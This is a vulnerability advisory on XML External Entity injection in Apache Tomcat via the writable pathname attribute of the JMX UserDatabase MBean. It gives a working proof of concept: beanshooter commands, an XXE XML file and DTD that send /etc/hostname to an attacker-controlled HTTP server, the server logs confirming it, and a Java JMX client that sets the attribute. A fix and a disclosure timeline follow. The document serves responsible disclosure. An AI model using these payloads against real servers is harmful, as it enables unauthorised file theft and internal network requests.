usd-2022-0036 | XML External Entity Injection in Apache Tomcat via JMX

Advisory ID: usd-2022-0036
Product: Apache Tomcat
Affected Version: Tested on Apache Tomcat 9.0.58, probably others
Vulnerability Type: Improper Restriction of XML External Entity Reference (CWE-611)
Security Risk: Medium
Vendor URL: https://tomcat.apache.org/
Vendor acknowledged vulnerability: No
Vendor Status: Not fixed

Tomcat deliberately allows external XML entities, as configuration files are expected to be controllable only by trusted users. Because of this, the issue does not meet the Apache Software Foundation's bar for servicing in a security update.

Affected Component(s)

The vulnerability affects the UserDatabase JMX component of Apache Tomcat. This MBean manages the users and roles that have access to the Apache Tomcat server.

Description

Apache Tomcat is a popular open source web server for running Java based web applications and can be monitored via JMX. JMX (Java Management Extensions) is a widely used framework for monitoring and managing Java applications over the network. Unauthorized access to JMX is a well known attack vector that gives an attacker many ways to compromise the underlying application server. That said, the actual exploitability depends strongly on the available MBeans, the configured JMX permissions and the presence of a Security Manager. Depending on these settings, the consequences of an attacker with JMX access range from critical Remote Code Execution (RCE) to medium severity information leakage.

Finding new ways of abusing available MBeans for malicious purposes is therefore of interest to attackers. We identified that the UserDatabase MBean, which is available by default on Apache Tomcat servers with JMX enabled, can be abused for XML External Entity Injection (XXE) attacks. This may allow an attacker to read local files from the affected system or to perform further requests within the internal network on the affected system's behalf.

Proof of Concept

For the following proof of concept, we use an Apache Tomcat server located at 172.17.0.2 with JMX enabled on port 1090. Furthermore, we use the beanshooter tool to demonstrate a possible attack.

First of all, we can enumerate available methods and attributes from the UserDatabase MBean using the following command:

[user@host ~]$ beanshooter info 172.17.0.2 1090 Users:type=UserDatabase,database=UserDatabase
[+] MBean Class: org.apache.catalina.mbeans.MemoryUserDatabaseMBean
[+] ObjectName: Users:type=UserDatabase,database=UserDatabase
[+]
[+]     Attributes:
[+]         modelerType (type: java.lang.String , writable: false)
[+]         readonly (type: boolean , writable: false)
[+]         roles (type: [Ljava.lang.String; , writable: false)
[+]         groups (type: [Ljava.lang.String; , writable: false)
[+]         users (type: [Ljava.lang.String; , writable: false)
[+]         pathname (type: java.lang.String , writable: true)
[+]         writable (type: null , writable: false)
[+]
[+]     Operations:
[+]         java.lang.String findGroup(java.lang.String groupname)
[+]         java.lang.String createUser(java.lang.String username, java.lang.String password, java.lang.String fullName)
[+]         void removeGroup(java.lang.String groupname)
[+]         void removeUser(java.lang.String username)
[+]         void save()
[+]         java.lang.String findRole(java.lang.String rolename)
[+]         void removeRole(java.lang.String rolename)
[+]         java.lang.String createGroup(java.lang.String groupname, java.lang.String description)
[+]         java.lang.String findUser(java.lang.String username)
[+]         java.lang.String createRole(java.lang.String rolename, java.lang.String description)

Apache Tomcat users are usually defined in the file /usr/local/tomcat/conf/tomcat-users.xml, but as the output shows, the pathname attribute of the UserDatabase is writable, so the location of that file can be changed. Surprisingly, even remote locations are accepted, e.g. a URI like http://172.17.0.1/test.xml. This enables an attacker to supply a malicious XML file that contains an XXE payload. The following listing shows two XML files that together exfiltrate a local file over an outbound connection: the parameter entity %file reads the target file, the externally loaded DTD declares the send entity whose SYSTEM URI carries the file content as a query parameter, and the reference to &send; in the document body triggers the request:

[qtc@devbox www]$ cat test.xml
<?xml version='1.0' encoding='utf-8'?>
<!DOCTYPE tomcat-users [
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % dtd SYSTEM "http://172.17.0.1:8000/test.dtd">
%dtd;
]>
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">
    &send;
</tomcat-users>
[qtc@devbox www]$ cat test.dtd
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://172.17.0.1:8000/?file=%file;'>">
%all;

By changing the pathname attribute of the UserDatabase MBean, the malicious XML documents are loaded from the attacker controlled server. After the XML and DTD files have been fetched, the Tomcat server (the JMX target) sends the content of the file /etc/hostname to the attacker controlled system:

[qtc@devbox ~]$ beanshooter attr 172.17.0.2 1090 Users:type=UserDatabase,database=UserDatabase pathname http://172.17.0.1:8000/test.xml
[qtc@devbox www]$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
172.17.0.2 - - [02/Aug/2022 07:20:35] "GET /test.xml HTTP/1.1" 200 -
172.17.0.2 - - [02/Aug/2022 07:20:35] "GET /test.dtd HTTP/1.1" 200 -
172.17.0.2 - - [02/Aug/2022 07:20:35] "GET /?file=76b0620c44ea HTTP/1.1" 200
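The attribute write that beanshooter performs above is a single setAttribute call on the remote MBeanServer. The following Java client is an added example (it is neither beanshooter nor Tomcat code) that does the same thing with the standard javax.management.remote API: it reads the current pathname, overwrites it with the attacker URL and reads it back. Host, port and the payload URL default to the lab values used in this advisory; the service URL format assumes the standard RMI connector that Tomcat exposes when started with -Dcom.sun.management.jmxremote.port=1090 (an assumption, not something shown on this page), and the example sends no credentials, matching the unauthenticated setup of the proof of concept.

```java
import java.util.Arrays;
import javax.management.Attribute;
import javax.management.MBeanServerConnection;
import javax.management.ObjectName;
import javax.management.remote.JMXConnector;
import javax.management.remote.JMXConnectorFactory;
import javax.management.remote.JMXServiceURL;

/*
 * Added example, not beanshooter and not part of Tomcat.
 * Equivalent of:
 *   beanshooter attr <host> <port> Users:type=UserDatabase,database=UserDatabase pathname <url>
 *
 * Usage: java UserDatabasePathname [host] [port] [url]
 */
public class UserDatabasePathname {

    // ObjectName taken from the beanshooter enumeration in the advisory.
    static final String USER_DB = "Users:type=UserDatabase,database=UserDatabase";

    public static void main(String[] args) throws Exception {
        String host = args.length > 0 ? args[0] : "172.17.0.2";
        int port = args.length > 1 ? Integer.parseInt(args[1]) : 1090;
        String payloadUrl = args.length > 2 ? args[2] : "http://172.17.0.1:8000/test.xml";

        // Assumption: default RMI connector, registered under the "jmxrmi" JNDI name.
        JMXServiceURL serviceUrl = new JMXServiceURL(
                "service:jmx:rmi:///jndi/rmi://" + host + ":" + port + "/jmxrmi");

        // No credentials: mirrors the unauthenticated JMX port of the PoC. For an
        // authenticated port, pass a Map with "jmx.remote.credentials" instead of null.
        try (JMXConnector connector = JMXConnectorFactory.connect(serviceUrl, null)) {
            MBeanServerConnection mbsc = connector.getMBeanServerConnection();
            ObjectName db = new ObjectName(USER_DB);

            System.out.println("pathname before: " + mbsc.getAttribute(db, "pathname"));

            // The writable attribute: pointing it at an HTTP URL makes the server fetch
            // the XML shown above, including its external DTD and the exfiltration entity.
            mbsc.setAttribute(db, new Attribute("pathname", payloadUrl));

            System.out.println("pathname after:  " + mbsc.getAttribute(db, "pathname"));

            // "users" is reported as [Ljava.lang.String; in the enumeration, hence the cast.
            String[] users = (String[]) mbsc.getAttribute(db, "users");
            System.out.println("users:           " + Arrays.toString(users));
        }
    }
}
```

Nothing beyond setAttribute is required; the server-side fetch of test.xml and test.dtd and the final GET /?file=... in the listing above are triggered entirely by the Tomcat side once the attribute holds the URL.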

Fix

Processing of external entities within the user database of Apache Tomcat should be disabled by default. If processing of external entities is needed as a feature, it can be re-enabled through a corresponding configuration option.

References

Timeline

  • 2022-08-02: First contact request via security@tomcat.apache.org.
  • 2022-08-04: Vendor states that "JMX access should be treated as equivalent to local root/admin access and restricted accordingly" and that the "Tomcat configuration files deliberately allow the use of XXE".
  • 2022-11-24: This advisory is published.

Credits

This security vulnerability was identified by Tobias Neitzel of usd AG.